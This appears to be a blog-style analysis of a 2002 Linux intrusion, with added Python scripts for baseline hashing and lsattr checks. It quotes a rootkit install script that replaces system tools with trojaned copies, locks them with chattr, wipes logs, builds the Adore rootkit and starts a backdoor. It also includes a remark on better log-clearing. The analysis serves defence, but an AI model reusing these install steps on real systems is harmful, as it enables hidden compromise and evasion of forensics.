Analysis of an Intrusion on My Machine
I had no idea anyone had gotten into my machine: it sits on the internal network, and getting in through the NAT is next to impossible. But while idly logged in and poking around, I noticed that one of the glibc shared libraries was missing. I went straight to /var/log/messages and found nothing at all. Ugh. I immediately brought up the backup machine, pulled the hard disk and plugged it into one of my other servers to examine it. Sigh, sure enough...
[root@mail a]# la- la
bash: la-: command not found
[root@mail a]# ls -la
total 704
drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
-rw------- 1 root root 241664 Jan 28 23:01 core
This is where the overflow happened. Looks like an FTP or SSH problem. It's an internal test machine on an internal IP, so I couldn't be bothered to upgrade, and this is the result... I'll gdb it later.
drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
-rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
Unbelievable, they just left it lying there. Can't tell whether this is an expert's slip or someone who can only run other people's tools.
drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
This is the rootkit! Looks like a lot of people use this one.
drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
See those two directories? They have already been modified and can't be trusted.
drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
[root@mail a]# date
星期二 02 5 18:28:17 CST 2002
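The approach the author takes here, pulling the disk and examining it from a clean server, only pays off if the analysis host has something trustworthy to compare against. The following added example (not code from the original post) compares the binaries on an offline-mounted evidence disk against a manifest of SHA-256 hashes recorded earlier from a trusted install; the mount point, the manifest path and the list of watched files are assumptions for the example, and the list covers the binaries the rootkit script further down replaces plus the libc the author noticed missing.

```python
#!/usr/bin/env python3
"""Compare system binaries on an offline-mounted disk against a known-good
baseline. Added example, not part of the original post. Assumptions: the
suspect disk is mounted read-only at some root (e.g. /mnt/evidence), and a
manifest of SHA-256 hashes was built earlier from a trusted install."""
import hashlib
import json
import os
import sys

# Files worth checking: the binaries the rootkit's install script swaps out,
# the init script it replaces, and the C library the author saw go missing.
# Paths are relative to the mounted root.
WATCHED = [
    "bin/ps", "usr/bin/pstree", "usr/bin/top", "bin/netstat",
    "sbin/ifconfig", "usr/sbin/tcpd", "usr/bin/find", "bin/ls",
    "usr/bin/dir", "sbin/syslogd", "etc/rc.d/init.d/network",
    "lib/libc.so.6",
]


def sha256_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, paths=WATCHED):
    """Record hashes from a TRUSTED root (a clean install of the same build).
    Files absent on the clean system are simply not recorded."""
    manifest = {}
    for rel in paths:
        full = os.path.join(root, rel)
        if os.path.isfile(full):
            manifest[rel] = sha256_file(full)
    return manifest


def compare(manifest, root):
    """Check the suspect root against the manifest. Nothing on the suspect
    disk is executed or trusted; only its bytes are read."""
    report = {"modified": [], "missing": [], "ok": []}
    for rel, expected in sorted(manifest.items()):
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            report["missing"].append(rel)       # e.g. a removed libc
        elif sha256_file(full) != expected:
            report["modified"].append(rel)      # e.g. a trojaned ps
        else:
            report["ok"].append(rel)
    return report


def save_manifest(manifest, path):
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


if __name__ == "__main__":
    # Usage:  script.py build <clean_root> <manifest.json>
    #         script.py check <manifest.json> <evidence_root>
    if len(sys.argv) == 4 and sys.argv[1] == "build":
        save_manifest(build_manifest(sys.argv[2]), sys.argv[3])
    elif len(sys.argv) == 4 and sys.argv[1] == "check":
        result = compare(load_manifest(sys.argv[2]), sys.argv[3])
        for kind in ("modified", "missing"):
            for rel in result[kind]:
                print(f"{kind.upper():9s} {rel}")
        print(f"{len(result['ok'])} file(s) matched the baseline")
    else:
        print(__doc__)
```

Build the manifest on the clean host, not on the suspect machine: the point of the author's disk-pull is that nothing on the compromised system, including its ls, find or any checksum tool, is trusted. A packaging database (rpm -V with a clean database) gives the same information when one is available; a plain hash manifest works for self-built systems like this one.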
[root@mail rk]# cat install
#!/bin/sh
unset HISTFILE
STARTDIR=`pwd`
CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
The author of this program is a real lowlife, stealing other people's credit cards too!
SMP=`uname -a | grep smp | wc -l`
I honestly never thought an intrusion would need to account for SMP.
clear
echo "***** \dev\hda1`s aka Mithra`s rootkit *****"
echo "* greetz 2 bogonel and Amorph|s *"
echo "* This is the RedHat 7.0 build *"
echo "********************************************"
sleep 2
clear
echo "Please wait while Setup is preparing your directory ... "
sleep 5
clear
echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
sleep 2
clear
DIR="/usr/lib/locale/ro_RO/uboot"
mkdir -p $DIR
mkdir -p $DIR/etc
cp -f * $DIR/ /dev/null
A rare way of clearing things out; this way there is no tracing the inodes.
cd $DIR
echo "Installing trojaned system files ..."
echo "[*] Process tools ..."
Replacing the process-viewing commands. Ugh.
echo " |---ps"
chattr -aiu /bin/ps
./sz /bin/ps ps
mv -f ps /bin/ps
chattr +aiu /bin/ps
echo " | \\"
echo " | |-- done replacing ps "
sleep 1
echo " |---pstree"
chattr -aiu /usr/bin/pstree
./sz /usr/bin/pstree pstree
mv -f pstree /usr/bin/pstree
chattr +aiu /usr/bin/pstree
echo " | \\"
echo " | |-- done replacing pstree "
sleep 1
echo " |---top"
chattr -aiu /usr/bin/top
./sz /usr/bin/top top
mv -f top /usr/bin/top
chattr +aiu /usr/bin/top
echo " | \\"
echo " | |-- done replacing top "
echo " |----|"
sleep 5
echo "[*] Network tools ..."
Replacing the network commands. Ugh, nasty.
echo " |---netstat"
chattr -aiu /bin/netstat
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
chattr +aiu /bin/netstat
echo " | \\"
echo " | |-- done replacing netstat "
sleep 1
echo " |---ifconfig"
chattr -aiu /sbin/ifconfig
./sz /sbin/ifconfig ifconfig
mv -f ifconfig /sbin/ifconfig
chattr +aiu /sbin/ifconfig
echo " | \\"
echo " | |-- done replacing ifconfig "
#echo " |---inetd"
Shameless, they swap out everything.
#chattr -aiu /usr/sbin/inetd
#./sz /usr/sbin/inetd inetd
#mv -f inetd /usr/sbin/inetd
#chattr +aiu /usr/sbin/inetd
#echo " | \\"
#echo " | |-- done replacing inetd "
sleep 1
echo " |---tcpd"
chattr -aiu /usr/sbin/tcpd
./sz /usr/sbin/tcpd tcpd
mv -f tcpd /usr/sbin/tcpd
chattr +aiu /usr/sbin/tcpd
echo " | \\"
echo " | |-- done replacing tcpd "
echo " |----|"
sleep 1
echo "[*] Filesystem tools ..."
Swapped the file-search commands.
echo " |---find"
chattr -aiu /usr/bin/find
./sz /usr/bin/find find
mv -f find /usr/bin/find
chattr +aiu /usr/bin/find
echo " | \\"
echo " | |-- done replacing find "
sleep 1
echo " |---ls"
chattr -aiu /bin/ls
./sz /bin/ls ls
mv -f ls /bin/ls
chattr +aiu /bin/ls
echo " | \\"
echo " | |-- done replacing ls "
echo " |----|"
echo " |---dir"
chattr -aiu /usr/bin/dir
./sz /usr/bin/dir dir
mv -f dir /usr/bin/dir
chattr +aiu /usr/bin/dir
echo " | \\"
echo " | |-- done replacing dir "
echo " |----|"
sleep 1
echo "[*] System tools ..."
echo " |---syslogd"
chattr -aiu /sbin/syslogd
./sz /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chattr +aiu /sbin/syslogd
echo " | \\"
echo " | |-- done replacing syslog "
echo " |----|"
Deletes all the log files, though this part is poorly written.
Not deleting but clearing the contents would have been better.
rm -f /var/log/messages
touch /var/log/messages
/etc/rc.d/init.d/syslog restart
sleep 1
echo "[*] Placing configuration files in $DIR/etc/ ..."
mv -f netstatrc $DIR/etc/netstatrc
mv -f procrc $DIR/etc/procrc
mv -f filerc $DIR/etc/filerc
mv -f logrc $DIR/etc/logrc
sleep 1
Now it starts compiling the add-on process. Fortunately, not an LKM.
echo "[*] Trying to install ADORE ..."
if [ -x /usr/bin/gcc ];
then
echo "GCC is present"
if [ -d /usr/src/linux ];
then
if [ $SMP -eq 0 ];
then
echo "We have a machine without SMP support"
cp -f Makefile.non-smp Makefile
else
echo "This machine supports SMP"
cp -f Makefile.smp Makefile
fi
make
mv -f ava /usr/bin/weather
It even changes its name and face, heh.
rm -f *.c *.h Makefile*
echo "ADORE is now installed ..."
else
echo "Kernel sources are not installed. Cannot install ADORE !"
fi
else
echo "GCC is not installed. Cannot install ADORE !"
fi
echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
mv -f network /etc/rc.d/init.d/network
sleep 5
mv -f twist2open /usr/bin/
echo "[*] Starting services ..."
#echo " |---backdoor ..."
#echo " |---sniffer ..."
Adds a backdoor and fires up a sniffer as well, hmph.
#echo " |---bnc ..."
/usr/bin/twist2open &
echo " | \\"
echo " | |-- done"
echo " |----|"
rm -f ./*pid* /*pi
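The chattr -aiu / chattr +aiu pairs around every replaced binary are the most distinctive trace this install script leaves: no package manager marks /bin/ps or /usr/bin/find immutable, append-only or undeletable, so those bits on a system binary are a finding in themselves. The following added example (not code from the original post) parses lsattr output and flags system binaries carrying those bits. It assumes lsattr -R is run from the trusted analysis host against the mounted evidence disk (the /mnt/evidence mount point is an assumption), which sidesteps the trojaned ls and find on that disk; the sample lsattr output embedded below is constructed for the example.

```python
#!/usr/bin/env python3
"""Flag system binaries carrying ext2/3 attribute bits (i, a, u) that a
package manager never sets. Added example, not from the original post.
Assumption: `lsattr -R <mount point>` is run from the trusted host against
the evidence disk; the sample output below is constructed."""
import subprocess
import sys

# Directories where vendor-installed binaries live (trailing slash so that
# "/library" does not match "/lib").
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")
# The three bits the rootkit's install script sets with `chattr +aiu`.
SUSPECT_FLAGS = {"i": "immutable", "a": "append-only", "u": "undeletable"}

# Constructed sample of `lsattr -R /mnt/evidence` output for this example.
LSATTR_SAMPLE = """\
----i----u---e------ /mnt/evidence/bin/ps
-------------e------ /mnt/evidence/bin/bash
----ia---u---e------ /mnt/evidence/bin/netstat
-------------e------ /mnt/evidence/usr/bin/vim
----i----u---e------ /mnt/evidence/usr/bin/find
-------------e------ /mnt/evidence/sbin/init
----i--------e------ /mnt/evidence/etc/resolv.conf
"""


def parse_lsattr(text):
    """Map each path to the set of attribute letters lsattr printed for it.
    lsattr prints the flag string, a space, then the path; a '-' means the
    bit is clear. Error lines (e.g. for non-ext2 files) are skipped."""
    attrs = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or parts[0].startswith("lsattr"):
            continue
        flags, path = parts
        attrs[path] = {c for c in flags if c != "-"}
    return attrs


def suspicious_binaries(attrs, root="/"):
    """Return [(path relative to the evidence root, sorted flag letters)] for
    files under a system directory that carry i, a or u."""
    hits = []
    for path, flags in attrs.items():
        if path.startswith(root):
            rel = "/" + path[len(root):].lstrip("/")   # strip the mount point
        else:
            rel = path
        if not rel.startswith(SYSTEM_DIRS):
            continue
        bad = sorted(flags & set(SUSPECT_FLAGS))
        if bad:
            hits.append((rel, bad))
    return sorted(hits)


def run_lsattr(root):
    """Run the trusted host's lsattr recursively over the mounted disk."""
    out = subprocess.run(["lsattr", "-R", root], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else None   # e.g. /mnt/evidence
    text = run_lsattr(root) if root else LSATTR_SAMPLE
    for rel, flags in suspicious_binaries(parse_lsattr(text), root or "/"):
        print(f"{rel}: {', '.join(SUSPECT_FLAGS[f] for f in flags)}")
```

Run against the sample, the script reports ps, netstat and find; /etc/resolv.conf is ignored because an immutable file under /etc is a common, legitimate admin choice, whereas immutable binaries under /bin or /sbin are not. The same attributes also explain why a simple rm or package reinstall on the live box would have failed against these files: the bits have to be cleared with the trusted host's chattr before the binaries can be restored.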